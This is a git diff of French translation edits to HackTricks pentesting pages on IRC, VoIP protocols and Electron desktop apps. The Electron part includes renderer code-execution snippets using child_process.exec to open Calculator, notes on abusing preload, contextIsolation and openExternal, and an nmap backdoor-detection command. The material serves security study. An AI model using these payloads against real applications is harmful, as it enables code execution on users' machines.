ran213eqdw123 0 * ran213eqdw123 @@ -98,9 +98,9 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66 * `recherche de votre nom d'hôte` -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**. diff --git a/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md b/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md index 744c0f7d4..d147b39dc 100644 --- a/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md +++ b/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md @@ -2,7 +2,7 @@
-Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)! +Apprenez le piratage AWS de zéro à héros avec htARTE (Expert AWS Red Team de HackTricks)! Autres façons de soutenir HackTricks : @@ -14,9 +14,9 @@ Autres façons de soutenir HackTricks :
-## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. @@ -42,8 +42,8 @@ Il s'agit de la norme de l'industrie, pour plus d'informations, consultez : MGCP (Media Gateway Control Protocol) est un **protocole de signalisation** et de **contrôle d'appel** décrit dans la RFC 3435. Il fonctionne dans une architecture centralisée, qui se compose de trois composants principaux : -1. **Agent d'appel ou contrôleur de passerelle multimédia (MGC)** : La passerelle maître dans l'architecture MGCP est responsable de **la gestion et du contrôle des passerelles multimédias**. Il gère les processus de configuration, de modification et de terminaison des appels. Le MGC communique avec les passerelles multimédias en utilisant le protocole MGCP. -2. **Passerelles multimédias (MG) ou passerelles esclaves** : Ces appareils **convertissent les flux multimédias numériques entre différents réseaux**, tels que la téléphonie commutée traditionnelle et les réseaux IP commutés par paquets. Ils sont gérés par le MGC et exécutent les commandes reçues de celui-ci. Les passerelles multimédias peuvent inclure des fonctions telles que le transcodage, la mise en paquets et l'annulation d'écho. +1. **Agent d'appel ou Contrôleur de passerelle multimédia (MGC)** : La passerelle maître dans l'architecture MGCP est responsable de **la gestion et du contrôle des passerelles multimédias**. Elle gère les processus de configuration, de modification et de terminaison des appels. Le MGC communique avec les passerelles multimédias en utilisant le protocole MGCP. +2. **Passerelles multimédias (MG) ou Passerelles esclaves** : Ces appareils **convertissent les flux multimédias numériques entre différents réseaux**, tels que la téléphonie commutée traditionnelle et les réseaux IP commutés par paquets. Ils sont gérés par le MGC et exécutent les commandes reçues de celui-ci. Les passerelles multimédias peuvent inclure des fonctions telles que le transcodage, la mise en paquets et l'annulation d'écho. 3. **Passerelles de signalisation (SG)** : Ces passerelles sont responsables de **la conversion des messages de signalisation entre différents réseaux**, permettant une communication transparente entre les systèmes de téléphonie traditionnels (par ex., SS7) et les réseaux basés sur IP (par ex., SIP ou H.323). Les passerelles de signalisation sont cruciales pour l'interopérabilité et garantissent que les informations de contrôle d'appel sont correctement communiquées entre les différents réseaux. En résumé, le MGCP centralise la logique de contrôle d'appel dans l'agent d'appel, ce qui simplifie la gestion des passerelles multimédias et de signalisation, offrant une meilleure évolutivité, fiabilité et efficacité dans les réseaux de télécommunication. @@ -66,11 +66,11 @@ SCCP offre une méthode de communication simple et efficace entre les serveurs d H.323 est un **ensemble de protocoles** pour la communication multimédia, comprenant la voix, la vidéo et la conférence de données sur des réseaux commutés par paquets, tels que les réseaux basés sur IP. Il a été développé par l'**Union internationale des télécommunications** (UIT-T) et fournit un cadre complet pour la gestion des sessions de communication multimédia. -Certains composants clés de l'ensemble H.323 comprennent : +Certains composants clés de la suite H.323 comprennent : -1. **Terminaux** : Ce sont des dispositifs terminaux, tels que des téléphones IP, des systèmes de visioconférence ou des applications logicielles, qui prennent en charge H.323 et peuvent participer à des sessions de communication multimédia. +1. **Terminaux** : Il s'agit de dispositifs terminaux, tels que les téléphones IP, les systèmes de visioconférence ou les applications logicielles, qui prennent en charge H.323 et peuvent participer à des sessions de communication multimédia. 2. **Passerelles** : Ces dispositifs convertissent les flux multimédias entre différents réseaux, comme la téléphonie commutée traditionnelle et les réseaux IP commutés par paquets, permettant l'interopérabilité entre H.323 et d'autres systèmes de communication. Ils peuvent également inclure des fonctionnalités supplémentaires, telles que le transcodage ou l'annulation d'écho. -3. **Contrôleurs de passerelle** : Ce sont des composants facultatifs qui fournissent des services de contrôle et de gestion d'appels dans un réseau H.323. Ils effectuent des fonctions telles que la traduction d'adresses, la gestion de la bande passante et le contrôle d'admission, aidant à gérer et optimiser les ressources réseau. +3. **Contrôleurs de passerelle** : Il s'agit de composants facultatifs qui fournissent des services de contrôle et de gestion d'appels dans un réseau H.323. Ils effectuent des fonctions telles que la traduction d'adresses, la gestion de la bande passante et le contrôle d'admission, aidant à gérer et à optimiser les ressources réseau. 4. **Unités de contrôle multipoint (MCU)** : Ces dispositifs facilitent les conférences multipoint en gérant et en mélangeant les flux multimédias de plusieurs terminaux. Les MCU permettent des fonctionnalités telles que le contrôle de la disposition vidéo, la commutation activée par la voix et la présence continue, permettant d'organiser des conférences à grande échelle avec plusieurs participants. H.323 prend en charge une gamme de codecs audio et vidéo, ainsi que d'autres services supplémentaires comme le renvoi d'appel, le transfert d'appel, la mise en attente et l'attente d'appel. Malgré son adoption généralisée au début de la VoIP, H.323 a été progressivement remplacé par des protocoles plus modernes et flexibles comme le **protocole d'initiation de session (SIP)**, qui offre une meilleure interopérabilité et une mise en œuvre plus facile. Cependant, H.323 reste utilisé dans de nombreux systèmes hérités et continue d'être pris en charge par divers fournisseurs d'équipements. @@ -84,7 +84,7 @@ IAX est connu pour sa **simplicité, son efficacité et sa facilité de mise en 1. **Port UDP unique** : IAX utilise un seul port UDP (4569) pour le trafic de signalisation et de média, ce qui simplifie le traversée des pare-feu et des NAT, facilitant le déploiement dans divers environnements réseau. 2. **Protocole binaire** : Contrairement aux protocoles basés sur du texte comme SIP, IAX est un protocole binaire, ce qui réduit sa consommation de bande passante et le rend plus efficace pour la transmission de données de signalisation et de média. 3. **Troncage** : IAX prend en charge le troncage, ce qui permet de combiner plusieurs appels en une seule connexion réseau, réduisant les frais généraux et améliorant l'utilisation de la bande passante. -4. **Cryptage natif** : IAX prend en charge le cryptage intégré, en utilisant des méthodes comme RSA pour l'échange de clés et AES pour le cryptage des médias, assurant une communication sécurisée entre les points d'extrémité. +4. **Chiffrement natif** : IAX prend en charge le chiffrement intégré, en utilisant des méthodes comme RSA pour l'échange de clés et AES pour le chiffrement des médias, assurant une communication sécurisée entre les points d'extrémité. 5. **Communication peer-to-peer** : IAX peut être utilisé pour une communication directe entre les points d'extrémité sans nécessiter de serveur central, permettant un routage d'appel plus simple et plus efficace. Malgré ses avantages, IAX présente certaines limitations, telles que son accent principal sur l'écosystème Asterisk et une adoption moins répandue par rapport à des protocoles plus établis comme SIP. En conséquence, IAX pourrait ne pas être le meilleur choix pour l'interopérabilité avec des systèmes ou des dispositifs non-Asterisk. Cependant, pour ceux travaillant dans l'environnement Asterisk, IAX offre une solution robuste et efficace pour la communication VoIP. @@ -92,29 +92,29 @@ Malgré ses avantages, IAX présente certaines limitations, telles que son accen ### SDP (Session Description Protocol) -SDP (Session Description Protocol) est un **format basé sur du texte** utilisé pour décrire les caractéristiques des sessions multimédias, telles que la voix, la vidéo ou la conférence de données, sur les réseaux IP. Il a été développé par le **Groupe de travail d'ingénierie de l'Internet (IETF)** et est défini dans le **RFC 4566**. SDP ne gère pas la transmission réelle des médias ou l'établissement de session, mais est utilisé en conjonction avec d'autres protocoles de signalisation, comme **SIP (Session Initiation Protocol)**, pour négocier et échanger des informations sur les flux multimédias et leurs attributs. +SDP (Session Description Protocol) est un **format basé sur du texte** utilisé pour décrire les caractéristiques des sessions multimédias, telles que la voix, la vidéo ou la conférence de données, sur les réseaux IP. Il a été développé par le **Groupe de travail d'ingénierie de l'Internet (IETF)** et est défini dans le **RFC 4566**. SDP ne gère pas la transmission réelle des médias ou l'établissement de session, mais est utilisé en conjonction avec d'autres protocoles de signalisation, comme **SIP (Session Initiation Protocol)**, pour négocier et échanger des informations sur les flux médias et leurs attributs. Certains éléments clés de SDP comprennent : 1. **Informations sur la session** : SDP décrit les détails d'une session multimédia, y compris le nom de la session, la description de la session, l'heure de début et l'heure de fin. -2. **Flux multimédias** : SDP définit les caractéristiques des flux multimédias, tels que le type de média (audio, vidéo ou texte), le protocole de transport (par exemple, RTP ou SRTP), et le format du média (par exemple, les informations sur le codec). +2. **Flux médias** : SDP définit les caractéristiques des flux médias, tels que le type de média (audio, vidéo ou texte), le protocole de transport (par exemple, RTP ou SRTP) et le format média (par exemple, informations sur le codec). 3. **Informations de connexion** : SDP fournit des informations sur l'adresse réseau (adresse IP) et le numéro de port où les médias doivent être envoyés ou reçus. -4. **Attributs** : SDP prend en charge l'utilisation d'attributs pour fournir des informations supplémentaires et facultatives sur une session ou un flux multimédia. Les attributs peuvent être utilisés pour spécifier diverses fonctionnalités telles que les clés de chiffrement, les exigences de bande passante ou les mécanismes de contrôle des médias. +4. **Attributs** : SDP prend en charge l'utilisation d'attributs pour fournir des informations supplémentaires facultatives sur une session ou un flux média. Les attributs peuvent être utilisés pour spécifier diverses fonctionnalités telles que les clés de chiffrement, les exigences de bande passante ou les mécanismes de contrôle des médias. SDP est généralement utilisé dans le processus suivant : -1. Une partie initiatrice crée une description SDP de la session multimédia proposée, y compris les détails des flux multimédias et de leurs attributs. +1. Une partie initiatrice crée une description SDP de la session multimédia proposée, y compris les détails des flux médias et de leurs attributs. 2. La description SDP est envoyée à la partie réceptrice, généralement intégrée dans un message de protocole de signalisation comme SIP ou RTSP. 3. La partie réceptrice traite la description SDP, et en fonction de ses capacités, elle peut accepter, rejeter ou modifier la session proposée. -4. La description SDP finale est renvoyée à la partie initiatrice dans le cadre du message de protocole de signalisation, complétant ainsi le processus de négociation. +4. La description SDP finale est renvoyée à la partie initiatrice dans le cadre du message de protocole de signalisation, complétant le processus de négociation. La simplicité et la flexibilité de SDP en font une norme largement adoptée pour décrire des sessions multimédias dans divers systèmes de communication, jouant un rôle crucial dans l'établissement et la gestion de sessions multimédias en temps réel sur les réseaux IP. ### RTP / RTCP / SRTP / ZRTP -1. **RTP (Real-time Transport Protocol)** : RTP est un protocole réseau conçu pour la livraison de données audio et vidéo, ou d'autres médias en temps réel, sur les réseaux IP. Développé par l'**IETF** et défini dans le **RFC 3550**, RTP est couramment utilisé avec des protocoles de signalisation comme SIP et H.323 pour permettre la communication multimédia. RTP fournit des mécanismes de **synchronisation**, de **séquençage** et de **horodatage** des flux multimédias, contribuant à assurer une lecture fluide et opportune des médias. -2. **RTCP (Real-time Transport Control Protocol)** : RTCP est un protocole compagnon de RTP, utilisé pour surveiller la qualité de service (QoS) et fournir des retours sur la transmission des flux multimédias. Défini dans le même **RFC 3550** que RTP, RTCP **échange périodiquement des paquets de contrôle entre les participants d'une session RTP**. Il partage des informations telles que la perte de paquets, le jitter et le temps de propagation, ce qui aide à diagnostiquer et à s'adapter aux conditions du réseau, améliorant ainsi la qualité globale des médias. -3. **SRTP (Secure Real-time Transport Protocol)** : SRTP est une extension de RTP qui fournit **le chiffrement**, **l'authentification des messages** et **la protection contre les rejeux** pour les flux multimédias, assurant une transmission sécurisée des données audio et vidéo sensibles. Défini dans le **RFC 3711**, SRTP utilise des algorithmes cryptographiques comme AES pour le chiffrement et HMAC-SHA1 pour l'authentification des messages. SRTP est souvent utilisé en combinaison avec des protocoles de signalisation sécurisés comme SIP sur TLS pour fournir une sécurité de bout en bout dans la communication multimédia. -4. **ZRTP (Zimmermann Real-time Transport Protocol)** : ZRTP est un protocole d'accord de clé cryptographique qui fournit **le chiffrement de bout en bout** pour les flux multimédias RTP. Développé par Phil Zimmermann, le créateur de PGP, ZRTP est décrit dans le **RFC 6189**. Contrairement à SRTP, qui repose sur des protocoles de signalisation pour l'échange de clés, ZRTP est conçu pour fonctionner indépendamment du protocole de signalisation. Il utilise **l'échange de clés Diffie-Hellman** pour établir un secret partagé entre les parties communicantes, sans nécessiter de confiance préalable ou d'infrastructure de clés publiques (PKI). ZRTP inclut également des fonctionnalités telles que les **Chaînes d'authentification courtes (SAS)** pour se protéger contre les attaques de l'homme du milieu. +1. **RTP (Real-time Transport Protocol)** : RTP est un protocole réseau conçu pour la livraison de données audio et vidéo, ou d'autres médias en temps réel, sur les réseaux IP. Développé par l'**IETF** et défini dans le **RFC 3550**, RTP est couramment utilisé avec des protocoles de signalisation comme SIP et H.323 pour permettre la communication multimédia. RTP fournit des mécanismes de **synchronisation**, de **séquençage** et d'**horodatage** des flux médias, contribuant à assurer une lecture fluide et opportune des médias. +2. **RTCP (Real-time Transport Control Protocol)** : RTCP est un protocole compagnon de RTP, utilisé pour surveiller la qualité de service (QoS) et fournir des retours sur la transmission des flux médias. Défini dans le même **RFC 3550** que RTP, RTCP **échange périodiquement des paquets de contrôle entre les participants à une session RTP**. Il partage des informations telles que la perte de paquets, le jitter et le temps de propagation, ce qui aide à diagnostiquer et à s'adapter aux conditions du réseau, améliorant ainsi la qualité globale des médias. +3. **SRTP (Secure Real-time Transport Protocol)** : SRTP est une extension de RTP qui fournit **le chiffrement**, **l'authentification des messages** et **la protection contre les rejeux** pour les flux médias, assurant une transmission sécurisée des données audio et vidéo sensibles. Défini dans le **RFC 3711**, SRTP utilise des algorithmes cryptographiques comme AES pour le chiffrement et HMAC-SHA1 pour l'authentification des messages. SRTP est souvent utilisé en combinaison avec des protocoles de signalisation sécurisés comme SIP sur TLS pour fournir une sécurité de bout en bout dans la communication multimédia. +4. **ZRTP (Zimmermann Real-time Transport Protocol)** : ZRTP est un protocole d'accord de clé cryptographique qui fournit **le chiffrement de bout en bout** pour les flux médias RTP. Développé par Phil Zimmermann, le créateur de PGP, ZRTP est décrit dans le **RFC 6189**. Contrairement à SRTP, qui repose sur des protocoles de signalisation pour l'échange de clés, ZRTP est conçu pour fonctionner indépendamment du protocole de signalisation. Il utilise **l'échange de clés Diffie-Hellman** pour établir un secret partagé entre les parties communicantes, sans nécessiter de confiance préalable ou d'infrastructure de clés publiques (PKI). ZRTP inclut également des fonctionnalités telles que les **Chaînes d'authentification courtes (SAS)** pour se protéger contre les attaques de l'homme du milieu. Ces protocoles jouent des rôles essentiels dans **la livraison et la sécurisation de la communication multimédia en temps réel sur les réseaux IP**. Alors que RTP et RTCP gèrent la transmission réelle des médias et la surveillance de la qualité, SRTP et ZRTP veillent à ce que les médias transmis soient protégés contre l'écoute, la manipulation et les attaques de rejeu. diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md index fb4ca11cf..f67e20d59 100644 --- a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md +++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md @@ -6,17 +6,17 @@ Autres façons de soutenir HackTricks : -* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! -* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) -* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** -* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub. +- Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! +- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) +- Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) +- **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +- **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. @@ -58,14 +58,14 @@ let win = new BrowserWindow(); //Open Renderer Process win.loadURL(`file://path/to/index.html`); ``` -Les paramètres du **processus de rendu** peuvent être **configurés** dans le **processus principal** à l'intérieur du fichier main.js. Certaines configurations **empêcheront l'application Electron de subir une RCE** ou d'autres vulnérabilités si les **paramètres sont correctement configurés**. +Les paramètres du **processus de rendu** peuvent être **configurés** dans le **processus principal** à l'intérieur du fichier main.js. Certaines configurations permettront d'**éviter que l'application Electron ne soit victime d'une RCE** ou d'autres vulnérabilités si les **paramètres sont correctement configurés**. L'application Electron **pourrait accéder au périphérique** via les API Node bien qu'il puisse être configuré pour l'empêcher : -* **`nodeIntegration`** - est `désactivé` par défaut. S'il est activé, permet d'accéder aux fonctionnalités de Node depuis le processus de rendu. -* **`contextIsolation`** - est `activé` par défaut. S'il est désactivé, les processus principal et de rendu ne sont pas isolés. +* **`nodeIntegration`** - est `désactivé` par défaut. S'il est activé, cela permet d'accéder aux fonctionnalités de Node depuis le processus de rendu. +* **`contextIsolation`** - est activé par défaut. S'il est désactivé, les processus principal et de rendu ne sont pas isolés. * **`preload`** - vide par défaut. -* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - est désactivé par défaut. Il restreindra les actions que NodeJS peut effectuer. +* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - est désactivé par défaut. Cela restreindra les actions que NodeJS peut effectuer. * Intégration de Node dans les Workers * **`nodeIntegrationInSubframes`** - est `désactivé` par défaut. * Si **`nodeIntegration`** est **activé**, cela permettrait l'utilisation des **API Node.js** dans les pages web qui sont **chargées dans des iframes** au sein d'une application Electron. @@ -115,7 +115,7 @@ Modifier la configuration start-main et ajouter l'utilisation d'un proxy tel que ```javascript "start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors", ``` -## Injection de Code Local dans Electron +## Injection de Code Local Electron Si vous pouvez exécuter localement une application Electron, il est possible que vous puissiez lui faire exécuter du code JavaScript arbitraire. Vérifiez comment faire dans: @@ -137,7 +137,7 @@ top.require('child_process').exec('open /System/Applications/Calculator.app'); ## RCE: preload -Le script indiqué dans ce paramètre est **chargé avant les autres scripts dans le moteur de rendu**, il a donc un **accès illimité aux API Node**: +Le script indiqué dans ce paramètre est **chargé avant les autres scripts dans le moteur de rendu**, il a donc un **accès illimité aux APIs Node**: ```javascript new BrowserWindow{ webPreferences: { @@ -174,12 +174,12 @@ runCalc(); ## RCE: XSS + contextIsolation -Le _**contextIsolation**_ introduit les **contextes séparés entre les scripts de la page web et le code interne JavaScript d'Electron** de sorte que l'exécution JavaScript de chaque code n'affecte pas les autres. Il s'agit d'une fonctionnalité nécessaire pour éliminer la possibilité de RCE. +La _**contextIsolation**_ introduit les **contextes séparés entre les scripts de la page web et le code interne JavaScript d'Electron** de sorte que l'exécution JavaScript de chaque code n'affecte pas l'autre. Il s'agit d'une fonctionnalité nécessaire pour éliminer la possibilité de RCE. Si les contextes ne sont pas isolés, un attaquant peut : 1. Exécuter du **JavaScript arbitraire dans le renderer** (XSS ou navigation vers des sites externes) -2. **Écraser la méthode intégrée** qui est utilisée dans le preload ou le code interne d'Electron par sa propre fonction +2. **Écraser la méthode intégrée** utilisée dans le preload ou le code interne d'Electron par sa propre fonction 3. **Déclencher** l'utilisation de la **fonction écrasée** 4. RCE ? @@ -207,7 +207,7 @@ window.addEventListener('click', (e) => { Pour plus d'informations sur ces exemples, consultez [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) et [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/) -Lors du déploiement d'une application de bureau Electron, il est crucial de garantir les paramètres corrects pour `nodeIntegration` et `contextIsolation`. Il est établi que l'exécution de code à distance côté client (RCE) ciblant les scripts de préchargement ou le code natif d'Electron depuis le processus principal est efficacement empêchée avec ces paramètres en place. +Lors du déploiement d'une application de bureau Electron, il est crucial de garantir les paramètres corrects pour `nodeIntegration` et `contextIsolation`. Il est établi que l'exécution de code à distance côté client (RCE) ciblant les scripts de préchargement ou le code natif d'Electron à partir du processus principal est efficacement empêchée avec ces paramètres en place. Lorsqu'un utilisateur interagit avec des liens ou ouvre de nouvelles fenêtres, des écouteurs d'événements spécifiques sont déclenchés, ce qui est crucial pour la sécurité et la fonctionnalité de l'application: ```javascript @@ -222,9 +222,9 @@ Ces écouteurs sont **remplacés par l'application de bureau** pour implémenter ![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (960).png>) -Les meilleures pratiques de sécurité d'Electron JS déconseillent d'accepter du contenu non fiable avec la fonction `openExternal`, car cela pourrait entraîner une RCE via divers protocoles. Les systèmes d'exploitation prennent en charge différents protocoles qui pourraient déclencher une RCE. Pour des exemples détaillés et une explication approfondie sur ce sujet, vous pouvez consulter [cette ressource](https://positive.security/blog/url-open-rce#windows-10-19042), qui inclut des exemples de protocoles Windows capables d'exploiter cette vulnérabilité. +Les meilleures pratiques de sécurité d'Electron JS déconseillent d'accepter du contenu non fiable avec la fonction `openExternal`, car cela pourrait entraîner une exécution de code à distance via divers protocoles. Les systèmes d'exploitation prennent en charge différents protocoles qui pourraient déclencher une exécution de code à distance. Pour des exemples détaillés et une explication approfondie sur ce sujet, vous pouvez consulter [cette ressource](https://positive.security/blog/url-open-rce#windows-10-19042), qui inclut des exemples de protocoles Windows capables d'exploiter cette vulnérabilité. -**Exemples d'exploitations de protocoles Windows :** +**Les exemples d'exploitations de protocoles Windows incluent :** ```html